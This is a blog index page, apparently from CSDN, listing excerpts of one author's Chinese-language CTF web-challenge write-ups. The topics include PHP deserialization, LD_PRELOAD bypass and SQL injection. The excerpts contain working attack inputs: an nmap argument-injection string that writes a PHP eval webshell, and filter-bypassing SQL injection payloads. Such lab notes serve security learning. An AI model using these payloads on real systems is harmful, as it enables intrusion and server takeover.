![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
刷题记录
学习ctf中
Y3pro
欢迎一起讨论问题
展开
-
文件上传记录
文件上传总结原创 2022-09-25 13:19:22 · 226 阅读 · 0 评论 -
BUU刷题记录
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。原创 2022-08-10 16:21:53 · 383 阅读 · 0 评论 -
HF2022-EzPHP复现
由于程序是运行时动态加载链接的库,如果让程序加载一个恶意的文件,那么就可以劫持程序的运行,从而可以绕过disable_function,执行命令。LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为。构造更大的二进制文件,通过在一个so文件尾部追加脏字符。...原创 2022-07-27 15:56:31 · 330 阅读 · 0 评论 -
[RoarCTF 2019]Easy Java
写在前面:java的目录泄漏和任意文件读取只能看着wp做题,思路先找/WEB-INF/web.xml,从里面找路由信息和文件信息,可以看到flag路由小坑:get方法下载不了,换成post方法下载文件下载 /WEB-INF/class/com/wm/ctf/FlagController.class文件,然后反编译,base64即可看到flag小坑:xml文件里面的.连接的是路径,要换成/反编译工具...原创 2022-05-01 11:28:00 · 663 阅读 · 0 评论 -
[NCTF2019]phar matches everything
写在前面:这篇文章并没有把这道题目做出来,一直找不到内网提供PHP-FPM的主机ip,就一直卡在这个地方,目前自己的能力不够,还不能解决这道题;现在将这篇做题的记录发出来,记录学习过程,希望将来回过头来再做这道题的时候能得心应手第一部分 phar反序列化+文件头和文件名检测绕过buu平台上给的github源码链接失效了,直接看的wp,一个简单的pop链构造,然后利用phar反序列化exp.php<?phpclass Easytest{ protected $test = '1';}原创 2022-04-20 00:20:11 · 363 阅读 · 0 评论 -
BUU CODE REVIEW 1
写在前面:这道题传引用的知识点,让我意识到php机制的一些不同,php有着自己的语言特性一篇详细介绍php引用特性的文章<?phphighlight_file(__FILE__);class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->correct = base64_encode(uniq原创 2022-04-17 18:40:38 · 3125 阅读 · 0 评论 -
[0CTF 2016]piapiapia
写在前面:反序列化逃逸1、试了sql注入,看了请求标头,什么都没有,试下有没有源码,发现存在www.zip2、进行代码审计,在config.php文件里发现flag,应该是要读取config.php才能拿到flag3、发现读取文件的函数profile.php尝试利用,往上面找看$profile[‘photo’]是不是可控,发现不可以利用,因为不知道md5加密之后的路径update.phpnickname这个参数可控,尝试反序列化字符串逃逸,注意到nickname会有长度限制,用数组绕过原创 2022-04-17 16:32:16 · 1673 阅读 · 0 评论 -
[网鼎杯 2020 朱雀组]Nmap
写在前面:利用nmap进行操作,或写shell,或读文件,参考[BUUCTF 2018] Online Tool涉及到nmap主要参数-oN 以标准格式保存-oG 以Grep格式保存-iL 读取文件并保存绕过escapeshellarg和escapeshellcmd1、上传一个webshell绕过过滤php文件名用1.phtmlshell中用<?=?>' 127.0.0.1 -oN 1.phtml <?=@eval($_POST[1]);?> '传入原创 2022-04-16 22:24:33 · 276 阅读 · 0 评论 -
[SWPU2019]Web1
写在前面:这道题练习的是无列名注入,一步一步进行构造即可1、通过测试(这个要自己找,不断的测试),广告名有sql二次注入(存入特殊广告名,查询的时候会报错)2、闭合语句因为过滤 -- # or 空格,尝试去闭合语句,构造语句'/**/||/**/'1'='13、尝试联合注入,先要找到多少列1、#order by 中的or被过滤了,因此不能用2、'/**/group/**/by/**/22,' #group by根据一个或多个列对结果集进行分组'/**/union/**/select/原创 2022-04-16 21:19:35 · 692 阅读 · 0 评论 -
[MRCTF2020]Ezpop+PYWebsite
1、打开环境,直接给源码<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function原创 2022-04-12 00:49:48 · 341 阅读 · 0 评论 -
记一次过滤注释符的sql注入
写在前面:这个是一个很简单的联合注入,但是因为我对于这种通过输入来闭合,从而实现注入不是很熟悉,因此记录一下1、fuzz测试发现会给出过滤的字段black_list is /if|and|\s|#|--/i不能通过注释掉后面的内容来闭合,所以这里要通过 '构造闭合用1'or'1'='1测试有提示,说明闭合成功2、联合注入爆表名username='/**/union/**/select/**/concat(table_name)/**/from/**/information_schema.原创 2022-03-29 23:09:00 · 1390 阅读 · 2 评论